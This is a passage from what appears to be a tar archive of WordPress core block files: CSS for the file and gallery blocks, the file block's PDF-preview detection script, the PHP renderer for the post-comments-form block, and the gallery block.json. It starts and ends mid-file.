.wp-block-file .wp-block-file__content-wrapper{
  flex-grow:1;
}
.wp-block-file a{
  min-width:1em;
}
.wp-block-file a:not(.wp-block-file__button){
  display:inline-block;
}
.wp-block-file .wp-block-file__button-richtext-wrapper{
  display:inline-block;
  margin-left:.75em;
}file/editor-rtl.min.css000060400000001373151330427370011051 0ustar00.wp-block-file{align-items:center;display:flex;flex-wrap:wrap;justify-content:space-between;margin-bottom:0}.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{height:auto}.wp-block[data-align=center]>.wp-block-file{text-align:center}.wp-block-file .components-resizable-box__container{margin-bottom:1em}.wp-block-file .wp-block-file__preview{height:100%;margin-bottom:1em;width:100%}.wp-block-file .wp-block-file__preview-overlay{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-file .wp-block-file__content-wrapper{flex-grow:1}.wp-block-file a{min-width:1em}.wp-block-file a:not(.wp-block-file__button){display:inline-block}.wp-block-file .wp-block-file__button-richtext-wrapper{display:inline-block;margin-right:.75em}file/style-rtl.css000060400000001312151330427370010132 0ustar00.wp-block-file{
  box-sizing:border-box;
}
.wp-block-file:not(.wp-element-button){
  font-size:.8em;
}
.wp-block-file.aligncenter{
  text-align:center;
}
.wp-block-file.alignright{
  text-align:right;
}
.wp-block-file *+.wp-block-file__button{
  margin-right:.75em;
}

:where(.wp-block-file){
  margin-bottom:1.5em;
}

.wp-block-file__embed{
  margin-bottom:1em;
}

:where(.wp-block-file__button){
  border-radius:2em;
  display:inline-block;
  padding:.5em 1em;
}
:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{
  box-shadow:none;
  color:#fff;
  opacity:.85;
  text-decoration:none;
}file/view.min.js000060400000001315151330427370007556 0ustar00import*as e from"@wordpress/interactivity";var t={d:(e,o)=>{for(var r in o)t.o(o,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:o[r]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};const o=(e=>{var o={};return t.d(o,e),o})({store:()=>e.store}),r=e=>{let t;try{t=new window.ActiveXObject(e)}catch(e){t=void 0}return t};(0,o.store)("core/file",{state:{get hasPdfPreview(){return!(window.navigator.userAgent.indexOf("Mobi")>-1||window.navigator.userAgent.indexOf("Android")>-1||window.navigator.userAgent.indexOf("Macintosh")>-1&&window.navigator.maxTouchPoints&&window.navigator.maxTouchPoints>2||(window.ActiveXObject||"ActiveXObject"in window)&&!r("AcroPDF.PDF")&&!r("PDF.PdfCtrl"))}}},{lock:!0});post-comments-form.php000060400000005365151330427370011040 0ustar00<?php
/**
 * Server-side rendering of the `core/post-comments-form` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-comments-form` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the filtered post comments form for the current post.
 */
function render_block_core_post_comments_form( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}

	if ( post_password_required( $block->context['postId'] ) ) {
		return;
	}

	$classes = array( 'comment-respond' ); // See comment further below.
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	add_filter( 'comment_form_defaults', 'post_comments_form_block_form_defaults' );

	ob_start();
	comment_form( array(), $block->context['postId'] );
	$form = ob_get_clean();

	remove_filter( 'comment_form_defaults', 'post_comments_form_block_form_defaults' );

	// We use the outermost wrapping `<div />` returned by `comment_form()`
	// which is identified by its default classname `comment-respond` to inject
	// our wrapper attributes. This way, it is guaranteed that all styling applied
	// to the block is carried along when the comment form is moved to the location
	// of the 'Reply' link that the user clicked by Core's `comment-reply.js` script.
	$form = str_replace( 'class="comment-respond"', $wrapper_attributes, $form );

	// Enqueue the comment-reply script.
	wp_enqueue_script( 'comment-reply' );

	return $form;
}

/**
 * Registers the `core/post-comments-form` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_post_comments_form() {
	register_block_type_from_metadata(
		__DIR__ . '/post-comments-form',
		array(
			'render_callback' => 'render_block_core_post_comments_form',
		)
	);
}
add_action( 'init', 'register_block_core_post_comments_form' );

/**
 * Use the button block classes for the form-submit button.
 *
 * @since 6.0.0
 *
 * @param array $fields The default comment form arguments.
 *
 * @return array Returns the modified fields.
 */
function post_comments_form_block_form_defaults( $fields ) {
	if ( wp_is_block_theme() ) {
		$fields['submit_button'] = '<input name="%1$s" type="submit" id="%2$s" class="wp-block-button__link ' . wp_theme_get_element_class_name( 'button' ) . '" value="%4$s" />';
		$fields['submit_field']  = '<p class="form-submit wp-block-button">%1$s %2$s</p>';
	}

	return $fields;
}
gallery/block.json000060400000005465151330427370010203 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/gallery",
	"title": "Gallery",
	"category": "media",
	"allowedBlocks": [ "core/image" ],
	"description": "Display multiple images in a rich gallery.",
	"keywords": [ "images", "photos" ],
	"textdomain": "default",
	"attributes": {
		"images": {
			"type": "array",
			"default": [],
			"source": "query",
			"selector": ".blocks-gallery-item",
			"query": {
				"url": {
					"type": "string",
					"source": "attribute",
					"selector": "img",
					"attribute": "src"
				},
				"fullUrl": {
					"type": "string",
					"source": "attribute",
					"selector": "img",
					"attribute": "data-full-url"
				},
				"link": {
					"type": "string",
					"source": "attribute",
					"selector": "img",
					"attribute": "data-link"
				},
				"alt": {
					"type": "string",
					"source": "attribute",
					"selector": "img",
					"attribute": "alt",
					"default": ""
				},
				"id": {
					"type": "string",
					"source": "attribute",
					"selector": "img",
					"attribute": "data-id"
				},
				"caption": {
					"type": "rich-text",
					"source": "rich-text",
					"selector": ".blocks-gallery-item__caption"
				}
			}
		},
		"ids": {
			"type": "array",
			"items": {
				"type": "number"
			},
			"default": []
		},
		"shortCodeTransforms": {
			"type": "array",
			"items": {
				"type": "object"
			},
			"default": []
		},
		"columns": {
			"type": "number",
			"minimum": 1,
			"maximum": 8
		},
		"caption": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": ".blocks-gallery-caption"
		},
		"imageCrop": {
			"type": "boolean",
			"default": true
		},
		"randomOrder": {
			"type": "boolean",
			"default": false
		},
		"fixedHeight": {
			"type": "boolean",
			"default": true
		},
		"linkTarget": {
			"type": "string"
		},
		"linkTo": {
			"type": "string"
		},
		"sizeSlug": {
			"type": "string",
			"default": "large"
		},
		"allowResize": {
			"type": "boolean",
			"default": false
		}
	},
	"providesContext": {
		"allowResize": "allowResize",
		"imageCrop": "imageCrop",
		"fixedHeight": "fixedHeight"
	},
	"supports": {
		"anchor": true,
		"align": true,
		"html": false,
		"units": [ "px", "em", "rem", "vh", "vw" ],
		"spacing": {
			"margin": true,
			"padding": true,
			"blockGap": [ "horizontal", "vertical" ],
			"__experimentalSkipSerialization": [ "blockGap" ],
			"__experimentalDefaultControls": {
				"blockGap": true,
				"margin": false,
				"padding": false
			}
		},
		"color": {
			"text": false,
			"background": true,
			"gradients": true
		},
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"allowEditing": false,
			"default": {
				"type": "flex"
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-gallery-editor",
	"style": "wp-block-gallery"
}
gallery/theme-rtl.min.css000060400000000173151330427370011402 0ustar00.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}gallery/theme-rtl.css000060400000000214151330427370010614 0ustar00.blocks-gallery-caption{
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .blocks-gallery-caption{
  color:#ffffffa6;
}gallery/editor-rtl.css000060400000007343151330427370011012 0ustar00:root :where(figure.wp-block-gallery){
  display:block;
}
:root :where(figure.wp-block-gallery)>.blocks-gallery-caption{
  flex:0 0 100%;
}
:root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{
  flex-basis:100%;
}
:root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{
  display:block;
}
:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{
  margin:4px 0;
}
:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{
  left:5px;
  position:absolute;
  top:0;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{
  display:none;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{
  margin-bottom:0;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder{
  margin:0;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{
  display:flex;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{
  z-index:2;
}
:root :where(figure.wp-block-gallery) .components-spinner{
  margin-right:-9px;
  margin-top:-9px;
  position:absolute;
  right:50%;
  top:50%;
}
.gallery-settings-buttons .components-button:first-child{
  margin-left:8px;
}

.gallery-image-sizes .components-base-control__label{
  display:block;
  margin-bottom:4px;
}
.gallery-image-sizes .gallery-image-sizes__loading{
  align-items:center;
  color:#757575;
  display:flex;
  font-size:12px;
}
.gallery-image-sizes .components-spinner{
  margin:0 4px 0 8px;
}
.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{
  outline:none;
}
.blocks-gallery-item figure.is-selected:before{
  bottom:0;
  box-shadow:0 0 0 1px #fff inset, 0 0 0 3px var(--wp-admin-theme-color) inset;
  content:"";
  left:0;
  outline:2px solid #0000;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
  z-index:1;
}
.blocks-gallery-item figure.is-transient img{
  opacity:.3;
}
.blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{
  display:inline-flex;
}
.blocks-gallery-item .block-editor-media-placeholder{
  height:100%;
  margin:0;
}
.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{
  display:flex;
}

.block-library-gallery-item__inline-menu{
  background:#fff;
  border:1px solid #1e1e1e;
  border-radius:2px;
  display:none;
  margin:8px;
  position:absolute;
  top:-2px;
  transition:box-shadow .2s ease-out;
  z-index:20;
}
@media (prefers-reduced-motion:reduce){
  .block-library-gallery-item__inline-menu{
    transition-delay:0s;
    transition-duration:0s;
  }
}
.block-library-gallery-item__inline-menu:hover{
  box-shadow:0 .7px 1px #0000001a,0 1.2px 1.7px -.2px #0000001a,0 2.3px 3.3px -.5px #0000001a;
}
@media (min-width:600px){
  .columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{
    padding:2px;
  }
}
.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){
  border:none;
  box-shadow:none;
}
@media (min-width:600px){
  .columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{
    height:inherit;
    padding:0;
    width:inherit;
  }
}
.block-library-gallery-item__inline-menu.is-left{
  right:-2px;
}
.block-library-gallery-item__inline-menu.is-right{
  left:-2px;
}

.wp-block-gallery ul.blocks-gallery-grid{
  margin:0;
  padding:0;
}

@media (min-width:600px){
  .wp-block-update-gallery-modal{
    max-width:480px;
  }
}

.wp-block-update-gallery-modal-buttons{
  display:flex;
  gap:12px;
  justify-content:flex-end;
}gallery/style.min.css000060400000035711151330427370010647 0ustar00.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 1em 1em 0;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-right:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,#000000b3,#0000004d 70%,#0000);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{margin-right:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-right:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-right:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-right:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-right:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-right:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-right:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-right:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-right:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,#000000b3,#0000004d 70%,#0000);bottom:0;box-sizing:border-box;color:#fff;font-size:13px;left:0;margin-bottom:0;max-height:60%;overflow:auto;padding:0 8px 8px;position:absolute;scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin;text-align:center;width:100%;will-change:transform}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{height:12px;width:12px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{background-color:initial}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{background-color:#fffc}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{scrollbar-color:#fffc #0000}@media (hover:none){.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#fffc #0000}}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}gallery/theme.min.css000060400000000173151330427370010603 0ustar00.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}gallery/style-rtl.min.css000060400000035700151330427370011444 0ustar00.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 0 1em 1em;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-left:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,#000000b3,#0000004d 70%,#0000);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 